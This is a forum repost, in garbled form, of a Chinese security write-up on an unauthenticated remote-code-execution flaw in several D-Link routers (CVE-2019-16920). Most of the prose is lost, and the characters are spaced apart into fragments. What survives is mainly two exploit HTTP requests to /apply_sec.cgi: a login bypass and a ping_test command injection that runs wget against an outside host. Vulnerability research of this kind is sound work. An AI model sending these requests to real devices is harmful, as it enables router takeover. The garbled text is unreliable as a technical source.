搜索

[14775] 2019-11-03_分析多款D-Link路由器中未经授权的RCE漏洞

文档创建者:s7ckTeam
浏览次数:31
最后更新:2025-01-18
2019-11-03_分析多款D-Link路由器中未经授权的RCE漏洞 D - L i n k R C E A l p h a _ h 4 c k   F r e e B u f   2 0 1 9 - 1 1 - 0 3 2 0 1 9 F o r t i n e t F o r t i G u a r d   L a b s D - L i n k F G - V D - 1 9 - 1 1 7 / C V E - 2 0 1 9 - 1 6 9 2 0 R C E D - L i n k D I R - 6 5 5 D I R - 8 6 6 L D I R - 6 5 2 D H P - 1 5 6 5 U R I   / a p p l y _ s e c . c g i a p p l y _ s e c . c g i   / w w w / c g i / s s i d o _ s s c   ( 0 x 4 0 a 2 1 0 ) c u r r e n t _ u s e r u s e r _ u s e r n a m e n v r a m c u r r e n t _ u s e r a c S t a c k 1 6 0 n v r a m c u r r e n t _ u s e r c u r r e n t _ u s e r a c S t a c k 1 6 0 u s e r _ u s e r n a m e b a s e 6 4 b a s e 6 4 e n c o d e ( u s e r _ u s e r n a m e ) , u s e r _ u s e r n a m e u s e r i V a r 2 0 e r r o r . a s p P O S T   / a p p l y _ s e c . c g i   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 2 3 2 . 1 2 8 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 6 9 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 6 9 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   e n - U S , e n ; q = 0 . 5 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   1 4 2 C o n n e c t i o n :   c l o s e R e f e r e r :   h t t p : / / 1 9 2 . 1 6 8 . 2 3 2 . 1 2 8 / U p g r a d e - I n s e c u r e - R e q u e s t s :   1 h t m l _ r e s p o n s e _ p a g e = l o g i n _ p i c . a s p & l o g i n _ n a m e = Y W R t a W 4 % 3 D & l o g _ p a s s = & a c t i o n = d o _ g r a p h _ a u t h & l o g i n _ n = a d m i n & t m p _ l o g _ p a s s = & g r a p h _ c o d e = & s e s s i o n _ i d = 6 2 3 8 4
d o - w h i l e p u t _ q u e r y s t r i n g _ e n v ( ) H T T P   P O S T E N V q u e r y _ v a r s ( a c t i o n ,   a c S t a c k 2 8 8 ,   0 x 8 0 ) a c t i o n 0 i V a r 2 0 i f U R I / a p p l y _ s e c . c g i p p c V a r 3 S S C _ S E C _ O B J S S S C _ O B J S p p c V a r 3 S S C _ S E C _ O B J S a c t i o n L A B _ 0 0 4 0 a 4 5 8 N o   O B J S   f o r   a c t i o n :   / a p p l y _ s e c . c g i S S C _ S E C _ O B J S a c t i o n S S C _ S E C _ O B J S i n i t _ p l u g i n ( ) 0 x 0 0 5 1 d 8 9 c
a c t i o n s u b _ 4 1 A 0 1 0 p i n g _ i p a d d r i n e t _ a t o n ( ) i n e t _ n t o a ( ) p i n g p i n g 8 . 8 . 8 . 8 % 0 a l s P O S T   H T T P a p p l y _ s e c . c g i p i n g _ t e s t p i n g _ i p a d d r 使 p i n g _ t e s t p i n g _ i p a d d r e c h o   1 2 3 4 * f o r t i n e t F B A l p h a _ h 4 c k F r e e B u f . C O M P O S T   / a p p l y _ s e c . c g i   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 2 3 2 . 1 2 8 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 . 1 4 ;   r v : 6 9 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 6 9 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , * / * ; q = 0 . 8       A c c e p t - L a n g u a g e :   v i - V N , v i ; q = 0 . 8 , e n - U S ; q = 0 . 5 , e n ; q = 0 . 3       A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e       C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   1 3 1 C o n n e c t i o n :   c l o s e R e f e r e r :   h t t p : / / 1 9 2 . 1 6 8 . 2 3 2 . 1 2 8 / l o g i n _ p i c . a s p C o o k i e :   u i d = 1 2 3 4 1 2 3 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 h t m l _ r e s p o n s e _ p a g e = l o g i n _ p i c . a s p & a c t i o n = p i n g _ t e s t & p i n g _ i p a d d r = 1 2 7 . 0 . 0 . 1 % 0 a w g e t % 2 0 - P % 2 0 / t m p / % 2 0 h t t p : / / 4 5 . 7 6 . 1 4 8 . 3 1 : 4 3 2 1 / ? $ ( e c h o   1 2 3 4 )

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理